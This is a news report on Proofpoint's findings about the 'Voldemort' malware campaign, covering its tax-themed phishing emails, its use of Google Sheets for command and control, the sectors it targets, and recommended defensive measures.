Proofpoint researchers have uncovered a new malware strain named “Voldemort,” which is currently spreading through phishing emails. These emails cleverly disguise themselves by using Google Sheets, helping the malware avoid detection and gain access to sensitive data.
The malware targets a range of sectors including insurance, aerospace, transport, and education, with the intention of infiltrating company and organizational systems. While the identities of the attackers remain unknown, Proofpoint suspects that this campaign may be part of a broader cyber espionage effort.
The phishing emails associated with Voldemort are crafted to appear as though they are coming from legitimate authorities in the USA, Europe, or Asia. These emails are personalized to the recipient’s location using publicly available information to appear more convincing. They contain links that supposedly lead to documents with “updated tax information,” which are designed to lure recipients into clicking and ultimately downloading the malware.
Since the malware campaign began on August 5, 2024, over 20,000 phishing emails have been sent to more than 70 targeted companies. On peak days, up to 6,000 emails are sent, reaching a significant number of potential victims. When a recipient clicks on the provided link, they are directed to download a file that is disguised as a PDF but actually contains the malware.
Once installed, Voldemort operates by mimicking normal network traffic and using Google Sheets as a command-and-control server. This technique allows it to evade detection by security systems, as the traffic is not flagged as suspicious due to its use of Google’s API and embedded access data. The malware is designed not only to steal data but also to perform additional malicious actions, such as downloading other malware, deleting files, or temporarily disabling itself, making it a highly adaptable threat.
To protect against Voldemort, Proofpoint recommends several preventive measures: restrict access from external file-sharing services to only trusted servers, block unnecessary connections to TryCloudflare, and monitor for unusual PowerShell activity. Implementing these measures can help reduce the risk posed by this sophisticated malware campaign.